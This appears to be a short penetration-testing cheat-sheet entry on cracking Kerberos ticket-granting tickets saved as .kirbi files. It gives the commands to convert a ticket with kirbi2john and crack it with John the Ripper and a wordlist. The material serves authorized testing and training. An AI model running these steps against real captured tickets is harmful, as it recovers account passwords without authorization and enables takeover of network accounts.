Kerberos TGT Cracking
Last modified: 2023-11-11
The Kerberos Ticket-Granting Ticket (TGT) is created by the Kerberos authentication. Users can access to the network using these tickets. These are often saved as `.kirbi` extension and we may be able to crack them.
First convert the TGT to the hash which can be cracked by John The Ripper.
kirbi2john tgt.kirbi > hash.txt # or python2 /usr/share/john/kirbi2john.py tgt.kirbi > hash.txt
john --wordlist=wordlist.txt hash.txt